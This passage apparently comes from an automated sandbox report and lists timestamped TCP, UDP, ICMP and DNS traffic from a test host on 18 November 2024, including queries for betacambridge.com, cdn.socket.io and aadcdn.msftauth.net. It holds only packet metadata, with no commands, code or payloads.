                                            Nov 18, 2024 21:16:59.557424068 CET4434989213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.557579041 CET49892443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.557622910 CET49892443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.557622910 CET49892443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.557640076 CET4434989213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.557651997 CET4434989213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.560843945 CET49897443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.560878038 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.561013937 CET49897443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.561140060 CET49897443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.561156034 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.689654112 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.690268993 CET49893443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.690320969 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.690778017 CET49893443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.690793037 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.717417002 CET4434989413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.717988014 CET49894443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.718019009 CET4434989413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.718465090 CET49894443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.718470097 CET4434989413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.750762939 CET4434989513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.751421928 CET49895443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.751485109 CET4434989513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.751940966 CET49895443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.751955986 CET4434989513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.823739052 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.823790073 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.823841095 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.823919058 CET49893443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.823982000 CET49893443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.824321985 CET49893443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.824321985 CET49893443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.824368954 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.824394941 CET4434989313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.828454018 CET49898443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.828501940 CET4434989813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.828588009 CET49898443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.828792095 CET49898443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.828803062 CET4434989813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.850919008 CET4434989413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.851043940 CET4434989413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.851113081 CET49894443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.851430893 CET49894443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.851452112 CET4434989413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.851464987 CET49894443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.851470947 CET4434989413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.855107069 CET49899443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.855143070 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.855242968 CET49899443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.855421066 CET49899443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.855434895 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.882364988 CET4434989513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.882441044 CET4434989513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.882539034 CET49895443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.882944107 CET49895443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.882993937 CET4434989513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.883027077 CET49895443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.883044004 CET4434989513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.888204098 CET49900443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.888240099 CET4434990013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:59.888317108 CET49900443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.888544083 CET49900443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:59.888554096 CET4434990013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.082745075 CET4434989613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.083391905 CET49896443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.083458900 CET4434989613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.084218979 CET49896443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.084233999 CET4434989613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.215823889 CET4434989613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.216027975 CET4434989613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.216114044 CET49896443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.216274023 CET49896443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.216301918 CET4434989613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.216315985 CET49896443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.216322899 CET4434989613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.219649076 CET49901443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.219695091 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.219777107 CET49901443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.219913960 CET49901443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.219928026 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.300849915 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.305315971 CET49897443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.305342913 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.305841923 CET49897443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.305847883 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.432516098 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.432595968 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.432647943 CET49897443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.432665110 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.432728052 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.432770014 CET49897443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.438076973 CET49897443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.438098907 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.438113928 CET49897443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.438122034 CET4434989713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.442106962 CET49902443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.442152023 CET4434990213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.442226887 CET49902443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.442382097 CET49902443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.442392111 CET4434990213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.586469889 CET4434989813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.587269068 CET49898443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.587361097 CET4434989813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.587789059 CET49898443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.587804079 CET4434989813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.591187000 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.591455936 CET49899443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.591469049 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.591803074 CET49899443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.591808081 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.635499954 CET4434990013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.636003971 CET49900443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.636023045 CET4434990013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.636516094 CET49900443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.636522055 CET4434990013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.722462893 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.722491980 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.722533941 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.722748041 CET49899443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.722784042 CET49899443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.723169088 CET49899443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.723184109 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.723196983 CET49899443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.723202944 CET4434989913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.723514080 CET4434989813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.723603964 CET4434989813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.723675013 CET49898443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.723823071 CET49898443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.723840952 CET4434989813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.723851919 CET49898443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.723858118 CET4434989813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.726676941 CET49903443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.726717949 CET4434990313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.726736069 CET49904443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.726763010 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.726797104 CET49903443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.726834059 CET49904443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.726990938 CET49904443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.726991892 CET49903443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.726999998 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.727003098 CET4434990313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.772239923 CET4434990013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.772531033 CET4434990013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.772842884 CET49900443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.772842884 CET49900443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.772842884 CET49900443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.775948048 CET49905443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.775990009 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.776060104 CET49905443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.776237965 CET49905443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.776249886 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.976057053 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.976878881 CET49901443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.976912975 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:00.977397919 CET49901443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:00.977405071 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.000099897 CET49900443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.000123978 CET4434990013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.122174025 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.122209072 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.122262001 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.122402906 CET49901443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.122402906 CET49901443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.122668028 CET49901443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.122668028 CET49901443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.122694016 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.122704029 CET4434990113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.126194954 CET49906443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.126247883 CET4434990613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.126363039 CET49906443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.126517057 CET49906443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.126528978 CET4434990613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.191647053 CET4434990213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.192240953 CET49902443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.192265987 CET4434990213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.192749977 CET49902443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.192763090 CET4434990213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.459355116 CET4434990313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.460086107 CET49903443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.460102081 CET4434990313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.460458994 CET49903443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.460465908 CET4434990313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.484858990 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.485462904 CET49904443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.485477924 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.486145020 CET49904443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.486150980 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.492804050 CET4434990213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.492882967 CET4434990213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.493017912 CET49902443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.493172884 CET49902443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.493194103 CET4434990213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.493210077 CET49902443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.493216991 CET4434990213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.496474981 CET49907443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.496592045 CET4434990713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.496673107 CET49907443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.496819973 CET49907443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.496856928 CET4434990713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.542824030 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.543325901 CET49905443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.543358088 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.543833971 CET49905443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.543848991 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.591023922 CET4434990313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.591104984 CET4434990313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.591267109 CET49903443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.591476917 CET49903443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.591476917 CET49903443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.591495037 CET4434990313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.591511965 CET4434990313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.595043898 CET49908443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.595071077 CET4434990813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.595310926 CET49908443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.595484018 CET49908443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.595495939 CET4434990813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.620791912 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.620817900 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.620871067 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.620929956 CET49904443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.620929956 CET49904443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.621159077 CET49904443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.621159077 CET49904443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.621170998 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.621179104 CET4434990413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.624353886 CET49909443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.624394894 CET4434990913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.624480963 CET49909443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.624679089 CET49909443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.624692917 CET4434990913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.676754951 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.676798105 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.676850080 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.676872969 CET49905443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.676912069 CET49905443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.677126884 CET49905443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.677145958 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.677156925 CET49905443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.677161932 CET4434990513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.680810928 CET49910443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.680850029 CET4434991013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.681149006 CET49910443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.681149006 CET49910443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.681197882 CET4434991013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.858520031 CET4434990613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.859337091 CET49906443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.859359026 CET4434990613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:01.860050917 CET49906443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:01.860058069 CET4434990613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:02.007788897 CET4434990613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:02.008107901 CET4434990613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:02.008831978 CET49906443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:02.008907080 CET49906443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:02.008925915 CET4434990613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:02.008939028 CET49906443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:02.008955956 CET4434990613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:02.012506962 CET49911443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:02.012552023 CET4434991113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:02.012633085 CET49911443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:02.012839079 CET49911443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:02.012851000 CET4434991113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:02.247369051 CET4434990713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:02.248006105 CET49907443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:02.248035908 CET4434990713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:17:02.248846054 CET49907443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:17:02.248852015 CET4434990713.107.246.45192.168.2.4
                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 18, 2024 21:15:42.368793011 CET53566991.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:43.729033947 CET53633061.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:44.144768000 CET6134453192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:44.144913912 CET5286853192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:44.422550917 CET53528681.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:44.445940018 CET53613441.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:46.637804985 CET6076353192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:46.638123989 CET5917353192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:46.645879984 CET53591731.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:46.645939112 CET53607631.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:47.176229000 CET4937853192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:47.176377058 CET5757153192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:47.183758974 CET53575711.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:47.187685013 CET53493781.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:47.612762928 CET5323653192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:47.612957001 CET5352153192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:47.892823935 CET53532361.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:47.895781040 CET53535211.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:48.575848103 CET5518753192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:48.576046944 CET6506353192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:48.577198982 CET6372953192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:48.577845097 CET6149453192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:48.585185051 CET53637291.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:48.585469007 CET53551871.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:48.585722923 CET53614941.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:48.600661039 CET53650631.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:48.623449087 CET5231153192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:48.623908043 CET5342253192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:48.631015062 CET53523111.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:48.632045031 CET53534221.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:48.715440035 CET53598451.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:50.045030117 CET5224953192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:50.045433044 CET5743153192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:50.206676006 CET5109353192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:50.207127094 CET5424653192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:50.213582039 CET53510931.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:50.214251041 CET53542461.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:50.322618961 CET53522491.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:50.457889080 CET53574311.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:51.530574083 CET5415553192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:51.530787945 CET6311153192.168.2.41.1.1.1
                                            Nov 18, 2024 21:15:51.807451010 CET53541551.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:51.810303926 CET53631111.1.1.1192.168.2.4
                                            Nov 18, 2024 21:15:56.038009882 CET138138192.168.2.4192.168.2.255
                                            Nov 18, 2024 21:16:00.836282015 CET53633041.1.1.1192.168.2.4
                                            Nov 18, 2024 21:16:19.851808071 CET53650491.1.1.1192.168.2.4
                                            Nov 18, 2024 21:16:42.305891037 CET53538041.1.1.1192.168.2.4
                                            Nov 18, 2024 21:16:42.743182898 CET53649581.1.1.1192.168.2.4
                                            TimestampSource IPDest IPChecksumCodeType
                                            Nov 18, 2024 21:15:48.600732088 CET192.168.2.41.1.1.1c243(Port unreachable)Destination Unreachable
                                            Nov 18, 2024 21:15:50.457995892 CET192.168.2.41.1.1.1c23d(Port unreachable)Destination Unreachable
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Nov 18, 2024 21:15:44.144768000 CET192.168.2.41.1.1.10xa610Standard query (0)betacambridge.comA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:44.144913912 CET192.168.2.41.1.1.10xa7dbStandard query (0)betacambridge.com65IN (0x0001)false
                                            Nov 18, 2024 21:15:46.637804985 CET192.168.2.41.1.1.10x10f2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:46.638123989 CET192.168.2.41.1.1.10xe8cbStandard query (0)www.google.com65IN (0x0001)false
                                            Nov 18, 2024 21:15:47.176229000 CET192.168.2.41.1.1.10x7d4eStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:47.176377058 CET192.168.2.41.1.1.10x2adfStandard query (0)cdn.socket.io65IN (0x0001)false
                                            Nov 18, 2024 21:15:47.612762928 CET192.168.2.41.1.1.10x2259Standard query (0)betacambridge.comA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:47.612957001 CET192.168.2.41.1.1.10xb0acStandard query (0)betacambridge.com65IN (0x0001)false
                                            Nov 18, 2024 21:15:48.575848103 CET192.168.2.41.1.1.10x2098Standard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.576046944 CET192.168.2.41.1.1.10x6e1cStandard query (0)www.w3schools.com65IN (0x0001)false
                                            Nov 18, 2024 21:15:48.577198982 CET192.168.2.41.1.1.10x659eStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.577845097 CET192.168.2.41.1.1.10x7474Standard query (0)cdn.socket.io65IN (0x0001)false
                                            Nov 18, 2024 21:15:48.623449087 CET192.168.2.41.1.1.10x23ccStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.623908043 CET192.168.2.41.1.1.10xb823Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                            Nov 18, 2024 21:15:50.045030117 CET192.168.2.41.1.1.10xc792Standard query (0)www.betacambridge.comA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.045433044 CET192.168.2.41.1.1.10xa082Standard query (0)www.betacambridge.com65IN (0x0001)false
                                            Nov 18, 2024 21:15:50.206676006 CET192.168.2.41.1.1.10x3cbeStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.207127094 CET192.168.2.41.1.1.10xfa8bStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                            Nov 18, 2024 21:15:51.530574083 CET192.168.2.41.1.1.10x2bafStandard query (0)www.betacambridge.comA (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:51.530787945 CET192.168.2.41.1.1.10xce2cStandard query (0)www.betacambridge.com65IN (0x0001)false
